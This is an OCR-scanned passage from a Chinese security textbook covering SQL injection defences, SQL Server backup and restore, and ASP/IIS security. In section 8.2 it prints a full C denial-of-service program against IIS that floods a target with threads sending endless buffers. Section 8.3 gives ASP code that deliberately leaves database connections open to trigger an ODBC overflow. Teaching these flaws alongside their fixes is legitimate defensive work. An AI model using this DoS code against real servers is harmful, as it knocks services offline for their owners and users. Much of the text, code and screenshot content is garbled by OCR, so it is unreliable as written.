SQL 注入 式 攻 击 的 防范 方法 如 下 : 

(1) 对 文本 框 进行 过 滤 

将 SQL 中 使 用 的 特殊 符号 ,如 “'”,“ 一 ”,“/ x*”,“;”,“%” 等 ,用 Replace() 方 法 过 滤 掉 ， 
缺少 了 这 些 符号 ,攻击 代码 也 就 变 得 没有 意义 了 。 

(2) 限制 文本 框 输入 字符 的 长 度 

如 果 用 户 名 的 长 度 最 多 只 有 10 个 字符 ,那么 将 文本 框 输入 字符 的 长 度 也 设置 为 10, 这 
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将 大 大 增加 攻击 者 在 SQL 语句 中 插入 恶意 代码 的 难度 。 

(3) 检查 用 户 输入 的 合法 性 ,确信 输入 的 内 容 只 包含 合法 的 数据 

可 以 使 用 正则 表达 式 来 检验 数据 是 否 合法 ,数据 检查 应 当 在 客户 端 和 服务 器 端 都 执行 ， 
执行 服务 器 端的 验证 ,是 为 了 弥补 客户 端 验证 机 制 的 脆弱 性 。 

(4) 使 用 带 参 数 的 SQL 语句 形式 

参数 提供 了 一 种 有 效 的 方法 来 组 织 SQL 语句 传递 的 值 ,以 及 向 存储 过 程 传递 的 值 。 另 
外 ,通过 确保 从 外 部 源 接收 的 值 仅 作为 值 来 传递 ,而 不 是 作为 SQL 的 一 部 分 传递 ,可 以 防止 
参数 受到 SQL 注入 式 攻 击 。 因 此 ,在 数据 源 处 不 会 执行 插入 到 值 中 的 SQL 命令 。 相 反 , 所 
传递 的 这 些 值 仅仅 被 视 为 参数 值 。 下 面 是 一 段 示 例 代码 。 


private void LoginButton Click(object sender,System. EventArgs e) 
{ 

// 动态 生成 的 SQL 语句 

string query = "select count( * ) from users where username = (@ Username and password = 
@Password" ; 

// 连 接 字 符 串 

string ConnectionString = "Server = (local);User id = sa;Pwd = ;Database = Northwind"; 

// 创 建 连接 及 Command 对 象 

System. Data. SqlClient. SqlCommand thisConnection = new System. Data. SqlClient. 
SqlConnection(ConnectionString); 
System. Data. SqlClient. SqlCommand thisCommand = new System. Data. SqlClient. 

SqlCommand( query, thisConnection); 

// 增 加 参数 名 及 类 型 

thisCommand. Parameters. Rdd("@Username" ,SqlDbType. NVarChar ,10); 

thisCommand. Parameters. Add("(@Password" ,SqlDbType. NVarChar ,10); 

// 给 参数 赋值 

thisCommand. Parameters["@Username"]. Value = txtUserName. Text; 

thisCommand. Parameters["(@Password" ]. Value = txtPassword. Text; 

// 数 据 库 操作 部 分 

thisCommand. Connection. Open(); 

Intn = (int)thisCommand. ExecuteScalar(); 

thisCommand. Connection. Close(); 

// 验 证 部 分 

If(n! =0) 

{ 
// 验 证 成 功 ,给 用 户 授权 ,并 提示 登录 成 功 


Else 
{ 
// 验 证 失败 ,提示 用 户 重新 输入 
} 
} 


(5) 保持 异常 信息 的 私有 性 
攻击 者 经 常 利用 服务 器 产生 异常 时 出 现 的 信息 。 因 为 异常 信息 中 可 能 包含 关于 应 用 程 
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序 或 数据 源 的 特定 信息 ,所 以 不 能 将 系统 的 异常 信息 返回 给 用 户 。 如 图 7. 16 所 示 , 如 果 需 
要 返回 一 定 的 错误 信息 , 则 返回 自 定义 的 消息 ,如 “连接 失败 ,请 与 系统 管理 员 联 系 ” 等 ,同时 


记录 特定 信息 以 便 网 站 管理 员 检 查 。 


Server Error in /' Application. 


INSERT 尘 名 与 COLUMN FOREIGN KEY 和 车 菜 'FK_fmDocCtr_fmDoc' 学 先 ， 汶 六 符 性 从 于 考 闹 座 
‘hotop100', 将 ‘fmDoc', column ‘DocId’'. J 


Description: an nnanded excepton eccured curng me execeton of me carrert weo reqoest Pease revew me sack race fer more normaten sbou he error and where t orgnaied n the 


[Exception Details: System Date Sqlcient SfExcepton MSERT 下 与 COLUUN FORBION KEY 约 更 TK_inDocor_ tnDoc 宰 殉 这 站 生 于 歼 库 Wotop1091， 末 iDec cam 
Dectr。 三 各 已 下 止 


sn unhandled exception was generated during the execution of the current web request, Infornation regarding the orifin and location of 
‘the exception can be identified using the exception ztack trace below. 


Stack Trace: 


[SqlException: INSERT 话 包 与 COLUMN FORETGN KEY 的 京 “FK_fabocCtr_feDoc ”闪闪 。 沪 4 认 并 生 于 站 所 床 “hotop100 ， 计 “fnDoc"，coluen “DocId'。 
] 


sePostBackEvent(String eventhrgument) +71 
String eventArgunent) +18 


7.16 系统 报错 信息 暴露 数据 库 结构 


SQL 注入 式 攻击 比较 常见 ,造成 的 问题 也 比较 严重 ,但 只 要 有 针对 性 的 使 用 上 述 方法 ， 


对 输入 的 信息 进行 控制 ,还 是 可 以 防止 这 种 攻击 的 。 


7.5 SQL 数据 库 的 备份 


打开 SQL 数据 库 ,选择 “SQL Server 组 ”|Locall “数据 库 ”|“ 某 一 数据 库 ”1“ 所 有 任务 ”| 
“备份 数据 库 ” 选 项 ,弹出 如 图 7.17 所 示 的 窗口 。 在 备份 数据 库 的 属性 页 中 ,用 户 可 以 选择 


备份 方式 为 “数据 库 -完全 ”或 “数据 库 - 差 异 " 单 选 按 钮 ,如 图 7. 18 所 示 。 


到 
第 规 | 过 项 | 
IEEEITITTETEITEOTEITTRTROTTITTTTTTEI | 下 数据 库 B backdate 5 
et 名 称 [N} backdate 备 份 
日 - 剧 | Microsoft SQL Servers 
日 全 sqt server 组 名 从 执 上 6 
日 do' 
TD Sage -aa 
由 国 个 数据库- 差异 (8) 
田 - 国 hotor 个 事务 日 志 四 ) 
四 图 mas New 个 文件 和 文件 姐 [E} PRIMARY] mf 
a mse TE 目的 
田 国 msdb ee 备份 到 : 合 而 带 0 全 磺 盘 区 
田 North 
人 四 mm | 
由 上 Srs | 扣除 M) 
由 temp' 
Refresh 
四国 数据 转折 1 说 内容 四. 
由 回 竺 理 Export List,,, 二 msg | 
由 旦 复制 【RE 人 追加 到 | 星体] 
日 国安 全 性 个 重 写 现 有 并 
钱 登录 ”tp 调度 
灰 调度 U} 。 | 桔 1 岂 在 旺 央 日 发 生 , 在 00 
a eT 
Ok Cancel Hep 


田 
站 
站 


图 7.17 选择 备份 数据 图 7.18 选择 备份 方式 
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选中 * 调 度 ” 复 选 框 ,可 以 进行 计划 任务 式 的 备份 控制 。 单 击 时 间 设 置 按钮 ,弹出 “编辑 
调度 ”对 话 框 ,如 图 7. 19 所 示 。 


本 
SN ES FS 用 E 
调度 类 型 
个 5QL Server 代理 启动 时 自动 启动 [5] 

个 每 当 CPU 用 置 时 局 动 器 
广 -次 中 BD} |200 5 了 时 间 四 | 82549 一 
全 反复 出 现 虽 ) 
1 EO 
更 改 的 - 


Cm |] ws | wm | 
图 7.19 “编辑 调度 ”对 话 框 


选中 “反复 出 现 ” 单 选 按钮 ,再 单 击 “ 更 改 ” 按 钮 ,弹出 作业 调度 对 话 框 ,如 图 7. 20 所 示 ， 
单 击 “ 确 定 ” 按 钮 ,系统 提示 备份 操作 成 功 ,如 图 7. 21 所 示 。 


要 

作业 和 名， 【新建 作业 ) 

发 生 炳 率 和 用 

个 每 天 D] | 每 W 站 当 周 ,在 : 

个 轿 册 Wi 三 星期 一 三 星 则 二 厂 星 央 三 。 厂 星 册 四 。 厂 星 区 五 

个 二 月 MI | 厂 星期 六 、 订 星期 日 

每 日 网 率 

一 次 改 生 于 W} 0000 ” 当 

发 RE hn 习 Fi FU [0mm 二 
终 上 NI [到 和 本 


持续 时 间 x 
开始 日 期 EG} [2005- 62 了] 个 结束 BMME} [2553 二 主 ) 备份 操作 已 硕 和 充 成 
人 无 结束 日 期 3 “ 
wm | | 
图 7.20 作业 调度 对 话 框 图 7.21 备份 操作 成 功 对 话 框 


7.6 SQL 数据 库 的 还 原 


打开 SQL 数据 库 ,选择 *SQL Server 组 |Local|* 数 据 库 ?|* 某 一 数据 库 ?|* 所 有 任务 ”| 
“还 原 数据 库 ? 选 项 ,弹出 如 图 7. 22 所 示 的 “还 原 数 据 库 ” 对 话 框 。 用 户 可 以 选择 在 “数据 
库 ”“ 文 件 组 或 文件 ”或 “从 设备 ”中 进行 数据 库 恢复 ,如 图 7. 23 所 示 。 在 “还 原 数 据 库 ” 对 话 
框 中 , 单 击 “ 选 择 设备 ”按钮 ,弹出 “选择 还 原文 件 ” 的 对 话 框 ,如 图 7. 24 所 示 。 

单 击 右 侧 的 查找 按钮 ,弹出 文件 夹 浏览 对 话 框 ,如 图 7. 25 所 示 。 

在 如 图 7. 22 所 示 对 话 框 中 , 单 击 “ 选 项 ”标签 ,打开 “选项 ”选项 卡 如 图 7. 26 所 示 。 在 
图 7. 26 中 ,选中 “在 现 有 的 数据 库 上 强制 还 原 ” 复 选 框 ,否则 当前 使 用 中 的 数据 库 是 不 允许 
进行 还 原 操作 的 ,最 后 , 单 击 “ 确 定 ”按钮 ,系统 报告 数据 库 还 原 成 功 ,如 图 7. 27 所 示 。 
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图 7.24 选择 还 原 的 文件 名 
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备份 设备 位 置 一 (local) x 


日 国 E\ (4997MB 空 用) 
日 外 databack 
由 - 国 engish 

由 国 Foxmal 
a netstudy 

由 - 国 RECYCLER 
由 - 国 System Volume Infomation 


图 7.25 选择 还 原文 件 的 浏览 窗口 


到 
常规 选项 | 
厂 在 还 原 每 个 备份 后 均 弹 出 磁带 5 加 果 有 ) [E] 
厂 在 还 原 每 个 备份 前 提示 人 P) 


恢复 完成 状态 
人 使 数据 库 可 以 继续 运行 ， 但 无 法 还 原 其 它 事务 日 志 [L)。 
个 使 数据 库 不 再 运行 ， 但 能 还 原 其 它 事务 日 志 [A)。 
个 使 数据 库 为 只 读 ， 但 能 还 原 其 它 事务 日 去 中), 


擅 消 文件 : Ere Fies\Microsofl SQL SetvetWMSSOL\SACKUPAUNI 图 


Co ] ec | He | 
7.26 ”对 数据 库 进行 强制 还 原 


SQL Server 全 业 管理 器 x 


Vi 数据 库 nydb' 的 还 原 已 顺利 成 。 


[Ee 


图 7.27 数据 库 还 原 成 功 


局 


on 上 性 
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.SQL Server 的 两 种 安全 模式 是 什么 ? 

.SQL Server 基本 安全 级 别 “ 登 录 ” 和 “用 户 ” 的 区 别 是 什么 ? 

.SQL Server 安全 性 机 制 的 四 个 等 级 分 别 是 什么 ? 

. 什么 是 SQL Server 中 的 角色 ? 在 SQL Server 中 角色 分 为 哪 两 种 ? 

. 什么 是 SQL Server 中 的 许可 ? 

. SQL 防范 注入 式 攻 击 的 方法 包含 哪 几 点 ? 

.【 思 考题 ] 如 何 利 用 SQL Server 数据 库 的 备份 与 还 原 机 制 保护 敏感 数据 ? 
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第 8 章 ASP 和 ASP.NET 的 安全 技术 


ASP 在 网 站 应 用 上 很 普遍 ,但 也 一 直 受 到 众多 安全 漏洞 的 困扰 。 
本 章 要 点 如 下 : 

。 ASP 和 ASP.NET 技术 对 比 ; 

。 针对 IIS 及 数据 源 的 攻击 ; 

。 提高 IIS 的 执行 效率 和 安全 性 。 


8.1 ASP 和 ASP. NET 技术 概述 


ASP(Microsoft Active Server Pages) 是 服务 器 端 脚本 编写 环境 。 使 用 
它 可 以 创建 和 和 运行 动态 的 Web 服务 器 应 用 程序 。 使 用 ASP 可 以 组 合 
HTML 页 .脚本 命令 和 ActiveX 组 件 来 创建 交互 的 Web 页 和 基于 Web 的 功 
能 强大 的 应 用 程序 。 


8.1.1 ASP 工作 原理 


ASP 技术 为 应 用 开发 商 提 供 了 基于 脚本 的 直观 .快速 和 高 效 的 应 用 开发 
手段 , 极 大 地 提高 了 开发 的 效率 。 在 讨论 ASP 的 安全 性 之 前 , 先 讨 论 一 下 
ASP 的 工作 方式 。 

ASP 脚本 是 按 特定 语法 (目前 支持 VBScript 和 JScript 两 种 脚本 语言 ) 
编写 的 文本 文件 ,是 与 标准 HTML 页 面 混合 在 一 起 的 脚本 。 当 用 户 用 Web 
浏览 器 通过 Internet 来 访问 基于 ASP 脚本 的 应 用 时 , Web 浏览 器 将 向 Web 
服务 器 发 出 HTTP 请 求 。Web 服务 器 分 析 并 判断 出 该 请 求 是 ASP 脚本 的 
应 用 后 ,自动 通过 ISAPI 接口 调用 ASP 脚本 的 解释 运行 引擎 (ASP. DLL) 。 
ASP. DLL 将 从 文件 系统 或 内 部 缓冲 区 获取 指定 的 ASP 脚本 文件 ,进行 语法 
分 析 并 解释 执行 。 最 终 的 处 理 结果 将 形成 HTML 格式 的 内 容 , 通 过 Web 服 
务 器 “ 原 路 "返回 给 Web 浏览 器 ,由 Web 浏览 器 在 客户 端 形成 最 终 的 结果 呈 
现 。 这 样 就 完成 了 一 次 完整 的 ASP 脚本 调用 。 若 干 个 有 机 的 ASP 脚本 调用 
就 组 成 了 一 个 完整 的 ASP 脚本 应 用 。 
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运行 ASP 所 需 的 环境 包括 : Microsoft Internet Information Server IIS 3. 0/4.0/5.0 
on Windows NT Server, Microsoft Internet Information Server 3.0/4.0/5.0 on Windows 
2000 ,Microsoft Personal Web Server on Windows 95/98。 


812 ASP 的 安全 特点 


微软 公司 称 ASP 在 网 络 安全 方面 的 一 大 优点 是 用 户 看 不 到 ASP 的 源 程序 。ASP 在 服 
务 端 执行 并 解释 成 标准 的 HTML 语句 ,再 传送 给 客户 端 浏览 器 .“ 屏 项 ? 源 程 序 不 但 能 很 
好 地 维护 ASP 开发 人 员 的 版 权 ,防止 别有用心 的 人 下 载 开发 人 员 的 源 代码 ,还 可 以 防止 别 
人 看 到 网 页 中 连接 数据 库 的 地 址 和 密码 等 信息 。 

同时 IIS(Internet Information Server) 支 持 虚 拟 目 录 , 这 样 可 以 隐蔽 真实 的 网 页 存储 位 
置 。 具 体操 作 方 法 是 : 右 击 “我 的 电脑 ”, 在 弹出 的 快捷 菜单 中 选择 “管理 ”命令 ,在 如 图 8.1 
所 示 窗 口中 右 击 “Internet 信息 服务 (IIS) 管 理 器 ”|“ 网 站 ”下 的 任意 网 站 ,在 弹出 的 快捷 菜单 
中 选择 “属性 "命令 ,在 如 图 8.2 所 示 对 话 框 中 单 击 “ 主 目录 "标签 可 以 管理 虚拟 目录 。 建 立 
虚拟 目录 对 于 管理 Web 站 点 具有 非常 重要 的 意义 ,虚拟 目录 隐藏 了 有 关 站 点 目录 结构 的 重 
要 信息 。 因 为 在 浏览 器 中 ,用 户 通 过 查看 网 页 属性 ,很 容易 就 能 获取 界面 的 文件 路 径 信息 ,如 
果 在 Web 页 中 使 用 物理 路 径 , 将 暴露 有 关 站 点 目录 的 重要 信息 ,这 容易 导致 系统 受到 攻击 。 


思 文 件 四 换 作 W 
HX mw 


型 计算 机 管理 本 地 ) 
系统 工具 


目录 安全 性 。 | “HTTP 头 。 | 。 自 定 义 镑 误 信 息 。 | 。 职务 器 扩展 
Tb 站 点 | 的 作 员 | 性 吴 。 | ISA 济 多 器 。 主 上 录 | 文档 


图 8.2 设置 网 站 虚拟 目录 
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8.13 


1. 核心 功能 和 服务 的 区 别 


Microsoft 公司 已 对 IIS 6. 0 进行 了 重新 设计 以 便利 用 基本 Windows 内 核 。 这 使 得 IIS 
6.0 具有 内 置 的 响应 、 请 求 缓存 和 队列 功能 ,并 能 够 将 应 用 程序 进程 请 求 直 接 路 由 到 工作 进 
程 ,从 而 提高 了 IIS 的 可 靠 性 。 


2. 隔离 模式 的 区 别 


IIS 6.0 引入 了 两 种 用 于 配置 应 用 程序 环境 的 操作 模式 : 工作 进程 隔离 模式 和 IIS 5.0 
隔离 模式 。 在 安装 IIS 6. 0 时 默认 的 隔离 模式 取决 于 用 户 执行 的 是 全 新 安装 还 是 升级 。 

如 果 是 全 新 安装 ,IIS 6. 0 将 以 工作 进程 隔离 模式 运行 。 如 果 是 从 IIS 4.0 或 IIS 5.0 
来 进行 升级 ,IIS 6.0 以 IIS 5.0 隔离 模式 运行 ,这 样 可 保持 与 现 有 应 用 程序 的 兼容 性 。 
IIS 5.0、IIS 5.1 和 IIS 6.0 特性 对 比如 表 8. 1 所 示 。 


lIS 6.0 与 早期 版 本 的 区 别 


表 8.1 特性 对 比 表 
IIS 5.0 JIS 5.1 IIS 6.0 
平台 Windows 2000 Windows XP Professional | Windows Server 2003 家 族 
体系 结构 32 位 32 位 和 64 位 32 位 和 64 位 
HTTP. sys 内 核 
TCP/IP 内 核 TCP/IP 内 核 当 IIS 以 IIS 5.0 隔离 模式 运行 
DLLhost. exe DLLhost. exe 时 : Inetinfo. exe( 对 于 进程 内 应 
人 (处 于 中 等 或 高 应 用 | (处 于 中 等 或 高 应 用 程序 | 用 程序 ) 或 DLLhost. exe( 对 于 进 
程序 隔离 模式 下 的 | 隔离 模式 下 的 多 个 DLL | 程 外 应 用 程序 ); 当 IIS 以 工作 进 
多 个 DLL 主机 ) 主机 ) 程 隔离 模式 运行 时 ，W3wp. exe 
(多 工作 进程 ) 
数据 库 配 置 二 进 制 二 进 制 XML 
Windows 身份 验证 
Windows 身份 验证 Windows 身份 验证 ssL 
SSL 
安全 性 SSL RE Kerberos 
Kerberos 安全 向 导 安全 向 导 
Passport 支持 
无 HTMLA 远程 管理 工具 (HTML) 
远 HTMLA 
di 终端 服务 终端 服务 
群集 支持 IIS 群集 Windows 支持 Windows 支持 
Windows 9x 上 的 个 » 
WWW 服务 人 Web 管理 器 Nl Windows 


Windows 2000 上 的 IIS 


Professional 上 的 IIS 


JIS 6. 0 隔离 模式 按照 与 IIS 5. 0 中 的 进程 管理 相似 的 方式 管理 应 用 程序 进程 : 所 有 的 
进程 内 应 用 程序 都 在 Inetinfo. exe 内 运行 ,进程 外 应 用 程序 在 单独 的 DLL 宿主 中 运行 。 一 
些 现 有 应 用 程序 可 能 无 法 并 发 运行 或 将 会 话 状态 与 应 用 程序 分 开 存储 。 因 此 ,在 IIS 6.0 隔 
离 模式 中 运行 进程 可 以 确保 与 大 多 数 现 有 应 用 程序 兼容 。 
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3. 配置 数据 库 的 区 别 


IIS 6.0 的 配置 数据 库 以 XML 文件 形式 存储 ,而 不 是 以 早期 版 本 中 的 二 进 制 格式 存 
储 。 位 置 仍 在 原 处 ,但 是 操作 方式 (更 新 、 回 深 、 还 原 和 扩展 ) 发 生 了 变化 。 系 统 安装 时 生成 
两 个 重要 文件 : MetaBase. xml 和 MBSchema. xml。 


4. 网 站 管理 的 区 别 


在 IIS 4.0 中 ,应 用 程序 既 可 以 在 与 Internet 服务 相同 的 进程 中 运行 ,也 可 以 在 单独 的 
进程 中 运行 。 在 IIS 5.0 和 IIS 5.1 中 ,应 用 程序 分 为 若干 汇集 的 进程 以 增强 性 能 并 提高 可 
伸缩 性 。 在 IIS 6.0 工作 进程 隔离 模式 中 ,IIS 可 将 应 用 程序 组 合 到 任意 数量 的 应 用 程序 
池 中 。 

在 如 图 8. 2 所 示 对 话 框 中 单 击 * 配 置 ?按钮 ,弹出 如 图 8. 3 所 示 的 “应 用 程序 配置 ”对 
话 框 ,在 图 8. 3 中 包含 一 个 超 文本 传输 协议 (HTTP) 动 作 列 表 , 它 们 可 由 映射 到 特定 文件 
类 型 的 应 用 程序 进行 处 理 , 该 动作 列表 与 IS 4. 0 有 所 不 同 。 在 IIS 4. 0 中 ,列表 中 包含 
“已 排除 ?或 未 被 处 理 的 动作 ,这 个 改变 是 为 了 适应 新 的 HTTP 动作 ,以 便 将 其 添加 到 协 
议 中 。 


应 用 程序 配置 x 


C: \WINDOWS\Mi ero: , HEA . 
C: MWINDOWS\Mi erosoft. NET\Fran. .. GET, JEA - 
ashx CMWINDOWS\Wicrosoft. NET\Pran. .. GET, NE 人 
asmx CC:\WINDOWS\icrosoft. NET\Fram. .. GET, HEA.. 
TYTImnWISVsvsten32Vinetsrvva ORT, | 


ee 编辑 到 ) 出 除 马 ) 


通配符 应 用 程序 映射 执行 顺序 ) 他) : 


插入 加.… | 
蝙 辑 吕 D | 
见 队 加) | 


上 移 0 下 称 人 0) | 


Ce ] ww | ww | 
图 8.3 “应 用 程序 配置 "属性 对 话 框 


与 IIS 4.0 相 比 ,IIS 5.0 中 自 定义 错误 文件 的 位 置 已 经 改变 。 而 IIS 6.0 已 经 添加 了 新 
的 自 定义 错误 文件 ,以 便 报告 更 详细 的 错误 信息 以 及 与 新 功能 有 关 的 错误 。 

在 早期 的 IIS 版 本 中 ,可 以 从 编译 的 C++ 应 用 程序 使 用 管理 基本 对 象 (ABO) 或 者 从 
C++ 脚本 文件 使 用 Active Directory 服务 界面 (ADSI) 以 编程 方式 管理 IIS。 而 IIS 6.0 包 


括 了 Windows 管理 规范 (WMD) 提 供 程 序 , WMI 这 一 技术 允许 管理 员 以 编程 方式 控制 所 有 
服务 和 应 用 程序 。 
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5. ASP 的 区 别 


从 IIS 6.0 开始 ,ASP 可 以 与 ASP. NET 一 起 使 用 。 

当 IIS 网 站 繁忙 时 ,可 能 会 出 现 这 种 情况 : 已 经 产生 了 最 大 数量 的 ASP 线程 ,而 一 些 
ASP 线程 却 挂 起 。 这 会 导致 性 能 降低 。IIS 6. 0 能 够 通过 回收 作为 ASP ISAPI 扩展 
(ASP. dll) 的 特定 实例 宿主 的 工作 进程 来 解决 线程 挂 起 问题 。 当 ASP 线程 在 IIS 6. 0 中 挂 
起 时 ,ASP. dll 调用 ISAPI 服务 器 支持 函数 HSE_REQ_REPORT_UNHEALTHY,WWW 
服务 回收 作为 ASP. dll 宿主 的 工作 进程 ,并 在 事件 日 志 中 创建 一 个 项 目 。 


6. 安全 管理 的 区 别 


IIS 6.0 中 的 一 个 最 重要 的 变动 涉及 Web 服务 器 安全 性 。 为 了 更 好 地 预防 攻击 ,在 默 
认 情 况 下 ,IIS 6.0 没有 将 IIS 安装 在 Microsoft Windows Server 2003 家 族 的 成 员 上 。 而 
且 , 当 用 户 最 初 安装 IIS 时 ,该 服务 在 高 度 安 全 的 “锁定 ”的 模式 下 安装 。 默 认 情 况 下 ,IIS 只 
为 静态 内 容 提 供 服务 ,也 就 是 说 ASP、ASP. NET、 服 务 器 端 包含 Web DAV 发 布 和 
FrontPage Server Extensions 等 功能 只 有 在 启用 时 才 工 作 。 如 果 安 装 IIS 6. 0 之 后 未 启用 
该 功能 , 则 IIS 返回 一 个 404 错误 。 

用 户 可 以 为 动态 内 容 提供 服务 ,并 通过 IIS 管理 器 中 的 Web 服务 扩展 结 点 启用 这 些 功 
能 。 同 样 , 如 果 应 用 程序 扩展 未 在 IIS 中 进行 映射 , 则 IIS 返回 一 个 404 错误 。 

通过 Web 服务 器 证 书 向 导 和 CTL 向 导 , 用 户 可 以 同步 Web 和 NTFS 的 安全 设置 , 获 
得 并 安装 服务 器 证 书 以 及 创建 和 修改 证 书信 任 列表 。 还 可 以 选择 一 个 加 密 服 务 提供 程序 
(CSP) 来 使 用 证 书 加 密 数据 。 


7. 性 能 设计 的 区 别 


为 了 限制 分 配给 ASP 页 的 内 存量 ,IIS 6. 0 将 ASPScriptFileCacheSize 的 默认 值 设置 
为 250 个 ASP 页 ,并 将 ASP Script Engine Cache Max 的 默认 值 设 置 为 125 个 脚本 引擎 。 
在 具有 一 组 大 量 请 求 的 ASP 页 的 站 点 上 ,可 以 将 ASPScriptFileCacheSize 值 设置 得 更 高 一 
些 。 因 为 ASP 页 的 编译 比 从 缓存 中 检索 页 要 慢 很 多 ,所 以 这 样 能 改善 性 能 。 在 只 具有 少量 
经 常 请 求 的 ASP 页 的 站 点 上 ,可 通过 将 该 数字 设置 得 小 一 些 来 节省 内 存 。 


8. IIS 工具 组 件 的 区 别 


在 Windows NT Server 系统 中 协作 数据 对 象 (CDONTS) 已 经 从 Windows Server 2003 
家 族 中 删除 。 如 果 Web 应 用 程序 使 用 CDONTS, 则 可 以 将 它们 转换 为 Microsoft 协作 数据 
对 象 (CDO)。CDONTS 中 的 大 多 数 方法 在 CDO 中 都 有 相 匹 配 的 方法 ,但 是 名 称 可 能 不 同 。 

IIS 工具 组 件 有 : Ad Rotator, Browser Capabilities,Content Linker,Content Rotator， 
Counters,Logging Utility, My Info,Page Counter,Status IIS 工具 组 件 和 工具 不 随 IIS 6.0 
一 起 安装 。 用 户 可 以 从 IIS 6. 0 资源 工具 包 中 获取 工具 组 件 DLL 文件 的 副本 。 但 是 ,如 果 
用 户 的 Web 服务 器 是 从 低 版 本 的 IIS 升 级 的 , 则 这 些 工具 组 件 不 会 被 删除 。 

在 64 位 Windows Server 2003 家 族 的 操作 系统 上 ,IIS 6. 0 作为 64 位 应 用 程序 运行 。 
这 意味 着 不 能 从 64 位 Windows Server 2003 家 族 的 操作 系统 上 的 IIS 调用 32 位 应 用 程序 。 
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例如 ,Jet 数据 库 引 擎 将 不 能 转换 为 64 位 应 用 程序 ,因此 ,不 能 使 用 ActiveX 数据 对 象 
(ADO) 从 ASP 页 打开 Microsoft Access 数据 库 。 但 是 , 仍 可 以 使 用 ADO 访问 其 他 驱动 程 
序 , 如 SQL Server 和 Exchange Server。 


8.2 对 IIS Web Server 进行 DoS 攻击 


当 IIS 处 于 默认 情况 下 ,容易 受到 拒绝 服务 的 攻击 。 如 果 注 册 表 中 有 一 个 叫 
MaxClientRequestBuffer 的 键 未 被 创建 ,针对 这 种 NT 系统 的 攻击 通常 能 奏效 。 

MaxClientRequestBuffer 这 个 键 用 于 设置 IIS 允许 接受 的 输入 量 。 如 果 MaxClient- 
RequestBuffer 设置 为 “256(bytes)”, 则 攻击 者 通过 输入 大 量 的 字符 请 求 将 被 限制 在 256B 
以 内 。 而 系统 的 默认 设置 对 此 不 加 限制 ,因此 未 加 防护 的 IIS 就 很 容易 受到 拒绝 服务 的 攻 
击 。 利 用 下 面 的 程序 。 可 以 很 容易 地 对 IIS 服务 实行 DoS 攻击 。 

# include 一 stdio. h> 

# include<windows, h> 

# define MAX_THREAD 666 

Void cng(); 


Char * server; 
Char * buffer; 
Int port; 
Int counter = 0; 
Int current_ threads = 0; 
Int main(int argc,char #x# argv) 
{ 
WORD tequila; 
WSADATA data; 
Int p; 
DWORD tid; 
HANDLE hThread[ 2000]; 
printf("CNG IIS DoS. \nMarc@eEye. com\nhttp: //www. eeye. com\n\"For my beloved. \"\n"); 
// 循 环 3 次 
If(argc<2) 
{ 
Printf("Usage: %s [server] [port]j\n" ,argv[0]); 
Exit(1); 
} 
Buffer = malloc(17500); 
Memset(buffer, 'A',strlen(buffer)); 
Server = argv[1]; 
Port = atoi(argv[2]); 
Tequila = MAKEWORD(1 ,1) ; 
Printf("Attempting to start winsock... "); 
If((WSAStartup(tequila,&data)) ! = 0) 
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Printf("failed to start winsock. \n"); 
Exit(1); 
} 
Else 
{ 
Printf("started winsock. \n\n"); 
} 
Counter = 0; 
For(p= 0; p<MAX_THREAD; ++ p) 
{ 
hThread[ counter | = CreateThread(0,0, (LPTHREAD_ 
START_ROUTINE) cng, (void* )++ counter,0,&tid); 
: 
Sleep(250); 
While(current_ threads) 
Sleep(250); 
Counter = 0; 
Printf("Terminated Threads. \n"); 
While (counter 一 MAX_THRERD) 
{ 
TerminateThread(hThread[ counter |] ,0); 
++ counter; 
} 
WSACleanup(); 
Return 0; 
# 
Void cng() 
{ 
Iint SockFD= 0,p; 
Struct sockaddr_in DstSAin; 
Char GETKILLED[ ] = "GET / HTTP/\r\n"; 
Int die=1; 
Printf("Entered CNG\n"); 
++ Current_threads; 
DstSAin. sin family= AF_INET; 
DstSAin. sin_port = htons((u_short)port); 
DstSAin. sin addr.s_addr = inet addr(server); 
If((SockFD= socket(RF_INET,SOCK_STRERM,0)) 一 0) 
Printf("Failed to create socket\n"); 
—— Current_threads; 
Return; 
} 
If(! connect(SockFD, (struct sockaddr * )&DstSAin,sizeof(DstSAin))) 
{ 
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P= send(SockFD,GETKILLED, strlen(GETKILLED) ,0); 
Printf("Step 1: % i\n",p); 
For(;;) 
{ 
P= Send(SockFD, buffer, strlen(buffer) ,0); 
Printf("P: %i\n",p); 
//put in some code to check if send= —1 more then X times we drop 
the loop and exit the thread 
//bla bla bla i love the dirtiness of concept code. 


} 

Current_ threads; 

Printf("Exited CNG\n"); 

Return; 

} 

攻击 结果 将 导致 NT 系统 的 CPU 利用 率 达 到 100%。 解 决 此 类 攻击 的 方法 是 ,在 对 话 框 
中 输入 Regedt32. exe, 在 注册 表 中 的 HKEY_LOCAL MACHINE\SYSTEM\CurrentControlSet 
\Services \ w3svc \ parameters 中 增加 一 个 键 值 : MaxClientRequestBuffer, 键 值 类 型 为 
REG_DWORD, 设 置 数值 为 十 进 制 ,具体 数值 设置 为 用 户 IIS 系统 允许 接受 的 URL 最 大 长 
度 。 通 常数 值 设 置 为 256 。 


8.3 ”MS ODBC 数据 库 连 接 溢出 导致 NT/9x 拒绝 服务 攻击 


Microsoft ODBC 数据 库 在 连接 和 断 开 时 可 能 存在 潜在 的 溢出 问题 (与 Microsoft 
Access 数据 库 相 关 ) 。 如 果 程 序 设 置 中 不 取消 上 一 次 的 连接 而 直接 允许 下 一 次 的 数据 库 连 
接 , 则 可 能 导致 服务 停止 。 受 影响 的 ODBC 版 本 有 : 3. 510. 3711. 0; ODBC Access 驱动 版 
本 有 : 3. 51. 1029. 00; 受 影 响 的 相关 软件 ，Windows NT 4. 0 Service Pack 5、IIS 4.0 
(i386)、.Microsoft Office 97 Professional (MSO97. dll: 8. 0. 0. 3507) ,使 用 如 下 代码 可 以 检 
测 网 站 是 否 包含 此 漏洞 。 

<% 


Set connVB = server. createobject("ADODB. Connection") 
ConnVB. open "DRIVER = {Microsoft Access Driver (* .mdb)}; DSN = miscdb" 


%> 

<html> 

=body> 

SS 省 略 HTML 代码 
所 ! -- We Connect to DB1 一 一 
<% 


Set connGlobal = server. createobject("ADODB. Connection") 
connGlobal. Open "DSN = miscdb;User = sa” 

mSQL = "arb SQL Statement" 

Set rsGlobal = connGlobal. execute(mSQL) 
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While not rsGlobal. Eof 
Response. Write rsGlobal("resultfrommiscdb") 
rsGlobal. movenext 
Wend 

'rsGlobal. close 

"这 里 故意 不 关闭 数据 库 应 用 

"set rsGlobal = nothing 

"connGlobal. close 

'set connGlobal = nothing 

> 

二 ! -- 再 次 打开 相同 的 数据 库 连 接 -一 

